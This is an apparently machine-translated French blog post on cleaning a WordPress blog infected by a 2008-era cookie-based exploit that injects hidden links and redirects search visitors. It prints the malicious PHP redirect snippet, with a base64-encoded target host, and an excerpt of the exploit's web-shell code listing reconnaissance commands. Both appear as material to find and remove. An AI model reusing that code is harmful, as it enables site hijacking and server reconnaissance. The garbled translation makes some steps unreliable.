Dans le dernier mois, j'ai reçu des avertissements virus dans le blog de certains visiteurs. Au départ, j'ai ignoré les avertissements, parce que j'ai installé un très bon antivirus (Kaspersky AV 2009) Et même blog depuis longtemps, je n'ai jamais reçu une alerte de virus (il ya longtemps .. J'ai vu quelque chose de suspect que la première actualisation disparu. Enfin ...).
Lentement commencé à montrer des variations importantes la circulation des visiteursAprès quoi, récemment diminué de façon constante du trafic et a commencé à être de plus en plus me dire que stealthsettings.com il est virused. Hier, j'ai reçu d'une personne une capture d'écran effectuée lorsque antivirus a bloqué un scénario à partir de stealthsettings.com:Trojan-Clicker.HTML.IFrame.gr. C'était assez convaincant pour moi, alors j'ai mis toutes les sources recherchées. La première idée qui m'est venue à l'esprit était de faire améliorer plus tard WordPress (2.5.1), mais pas avant de supprimer tous les fichiers de l'ancien script WordPress et faire base de données de sauvegarde. Cette procédure n'a pas fonctionné et il m'a probablement fallu beaucoup de temps pour comprendre où se trouvait le bogue, si cela ne m'avait pas dit. Eugen dans une discussion autour d'un café, il a trouvé lien Google et il serait bien de le voir.
MyDigitalLife.info, a publié un article intitulé: «WordPress Hack : Récupérez et corrigez Google et le moteur de recherche ou aucun trafic de cookies redirigé vers Your-Needs.info, AnyResults.Net, Golden-Info.net et d'autres sites illégaux"C'est la fin du fil dont j'avais besoin.
Il s'agit d'un exploiter de WordPress basé sur les cookiesQui je pense est très complexe et fait le livre. Assez intelligent pour faire une Injection SQL Blog de base de données, pour créer un utilisateur invisible un contrôle de routine simples Tableau de bord->Utilisateurs, vérifier les répertoires du serveur et des fichiers "en écriture" (ce chmod 777), de chercher et de exécuter fichiers avec les privilèges du groupe ou de la racine. Je ne sais pas qui exploitent le nom et voir qu'il ya peu d'articles écrits à son sujet, en dépit du fait que de nombreux blogs sont infectés, y compris la Roumanie. Ok ... Je vais essayer de tenter d'expliquer les généralités sur les virus.
Quel est le virus?
Tout d'abord, insérez les pages sources sur les blogs, des liens invisibles pour les visiteurs mais visible et indexables par les moteurs de recherche, notamment Google. De cette façon sites de transfert Page Rank indiquées par l'attaquant. Deuxièmement, un autre est inséré code de redirection URL pour les visiteurs en provenance de Google, Live, Yahoo, ... ou un lecteur de flux RSS et non le site en gâteau. un antivirus détecte que la redirection Trojan-Clicker.HTML.
Symptômes:
Diminution de la circulation des visiteurs massifEn particulier sur les blogs où la plupart des visiteurs proviennent de Google.
Identification: (c'est là que le problème se complique pour ceux qui ne connaissent pas grand chose à phpmyadmin, php et linux)
LA. ATTENTION! Faire d'abord une base de données de sauvegarde!
1. Vérifiez les fichiers source index.php, header.php, footer.php, Le thème du blog et de voir si il ya un code qui utilise le cryptage base64 ou contient "if ($ ser ==" 1? && sizeof ($ _ COOKIE) == 0) "sous la forme:
<?php
$seref=array(”google”,”msn”,”live”,”altavista”,
”ask”,”yahoo”,”aol”,”cnn”,”weather”,”alexa”);
$ser=0; foreach($seref as $ref)
if(strpos(strtolower
($_SERVER[’HTTP_REFERER’]),$ref)!==false){ $ser=”1?; break; }
if($ser==”1? && sizeof($_COOKIE)==0){ header(”Location: http://”.base64_decode(”YW55cmVzdWx0cy5uZXQ=”).”/”); exit;
}?>... Ou quelque chose. Supprimer ce code!
Cliquez sur l'image ...
Dans la capture d'écran ci-dessus, j'ai accidentellement sélectionné et " ". Ce code doit rester.
2. Utiliser phpMyAdmin et aller à la table de base de données wp_usersOù vérifier si il n'ya pas de nom d'utilisateur créé sur 00:00:00 0000-00-00 (Possible dans le champ USER_LOGIN pour écrire "WordPress”. Notez l'ID de cet utilisateur (champ ID) puis supprimez-le.
Cliquez sur l'image ...
* La ligne verte doit être retiré et conservé son identité. Dans le cas d' somnolentEtait ID = 8 .
3. Allez à la table wp_usermetaOù que vous situé et essuyer lignes de ID (où le champ user_id Valeur d'ID est supprimé).
4. table wp_option, Go active_plugins et de voir ce plugin est activé suspect. Il peut être utilisé comme terminaisons _old.giff, _old.pngg, _old.jpeg, _new.php.giff, etc. combinaisons d'extensions d'images riches avec _old et _new.
SELECT * FROM wp_options WHERE option_name = 'active_plugins'Supprimez ce plugin, puis allez sur le blog -> Dashboard -> Plugins, où vous désactivez et activez n'importe quel plugin.
Cliquez sur l'image pour la voir fichier apparaît virus active_plugins.
Suivez le chemin sur le serveur FTP ou SSH, indiqué dans active_plugins et supprimer le fichier à partir du serveur.
5. Toujours dans phpMyAdmin, dans le tableau wp_option, Trouvez et supprimez la ligne contenant "rss_f541b3abd05e7962fcab37737f40fad8«Et»internal_links_cache ".
En internal_links_cache, proposer des liens mails cryptés qui apparaissent dans un blog code de Google Adsaccepter, Le pirate.
6. Il est recommandé de changer le mot de Blog et à l'identification supprimer tous les userele suspect. Mettez à niveau vers la dernière version de WordPress et configurez le blog pour qu'il n'autorise plus les nouveaux utilisateurs à s'inscrire. Il n'y a pas de perte… peut aussi commenter inhabité.
J'ai essayé ci-dessus d'expliquer un peu, ce qu'il faut faire dans une telle situation, pour nettoyer le blog de ce virus. Le problème est beaucoup plus grave qu'il n'y paraît et pas presque résolu, car ils sont utilisés les failles de sécurité hébergeant le serveur web, ce qui est blog.
En tant que première mesure de sécurité, l'accès SSH, Faire quelques vérifications sur le serveur pour voir si il ya des fichiers comme * _old * et * _New. * Avec terminaisons.giff,. jpeg,. pngg,. jpgg. Ces fichiers doivent être supprimés. Si vous renommez un fichier, par exemple. top_right_old.giff in top_right_old.phpNous voyons que le fichier est exactement le serveur de code exploit.
Quelques instructions utiles pour vérifier, nettoyer et sécuriser le serveur. (via SSH)
1. cd / tmp et vérifier s'il ya des dossiers comme tmpVFlma ou un autre nom asemenatoare combinaisons et supprimez-le. Voir la capture d'écran ci-dessous, ces deux dossiers à moi:
rm-rf nom_dossier
2. Vérifier et éliminer (changer chmod-ul) que possible les dossiers avec des attributs chmod 777
trouver tous les fichiers inscriptibles dans le répertoire actuel : Trouvez. -Type f-perm-2-ls
trouver tous les répertoires accessibles en écriture dans répertoire courant: Trouvez. -Type d-perm-2-ls
trouver tous les répertoires et fichiers accessibles en écriture dans le répertoire actuel : trouver. -Permet -2 -ls
3. La recherche de fichiers suspects sur le serveur.
find . -name "*_new.php*"
find . -name "*_old.php*"
find . -name "*.jpgg"
find . -name "*_giff"
find . -name "*_pngg"4, ATTENTION! les fichiers qui ont mis peu SUID si SGID. Ces fichiers s'exécutent avec les privilèges de l'utilisateur (groupe) ou de la racine, et non l'utilisateur qui exécute le fichier. Ces fichiers peuvent mener à la compromission root, si les questions de sécurité. Si vous n'utilisez pas les fichiers SUID et SGID avec peu, jouer »chmod 0 " eux ou désinstaller paquet les contenant.
Exploiter contient quelque part dans la source ...:
if(!$safe_mode){
if($os_type == 'nix'){
$os .= execute('sysctl -n kern.ostype');
$os .= execute('sysctl -n kern.osrelease');
$os .= execute('sysctl -n kernel.ostype');
$os .= execute('sysctl -n kernel.osrelease');
if(empty($user)) $user = execute('id');
$aliases = array(
'' => '',
'find suid files'=>'find / -type f -perm -04000 -ls',
'find sgid files'=>'find / -type f -perm -02000 -ls',
'find all writable files in current dir'=>'find . -type f -perm -2 -ls',
'find all writable directories in current dir'=>'find . -type d -perm -2 -ls',
'find all writable directories and files in current dir'=>'find . -perm -2 -ls',
'show opened ports'=>'netstat -an | grep -i listen',
);
}else{
$os_name .= execute('ver');
$user .= execute('echo %username%');
$aliases = array(
'' => '',
'show runing services' => 'net start',
'show process list' => 'tasklist'
);
}Dit que moyen ... les failles de sécurité essentiellement. Ports ouvrir le répertoire «inscriptible» et du groupe privilèges d'exécution des fichiers / root.
Retour avec plus ...
Certains blogs infectés: www.blegoo.com, www.visurat.ro,
fulgerica.com, denisuca.com, www.ecostin.com,
www.razvanmatasel.ro,
blog.hrmarket.ro, www.nitza.ro,
motos.motomag.ro,
emi.brainient.com, www.picsel.ro,
www.mihaidragan.ro/kindablog/,
krumel.seo-point.com, www.itex.ro/blog,
www.radiology.ro,
www.dipse.ro/ionut/,
www.vinul.ro/blog/, www.damaideparte.ro,
dragos.roua.ro, www.artistul.ro/blog/,
www.mirabilismedia.ro/blog, blog.einvest.ro
... La liste est longue ... beaucoup.
Vous pouvez vérifier si un blog est infecté à l'aide du moteur de recherche Google. copier coller:
Site: www.blegoo.com achat
Bonne nuit et bon travail;) Bientôt, je pense qu'Eugen viendra avec des nouvelles, sur prevezibil.imprevizibil.com.
brb :)
ATTENTION! Changer le thème de WordPress ou mise à niveau vers WordPress 2.5.1, n'est PAS une solution pour se débarrasser de ce virus.
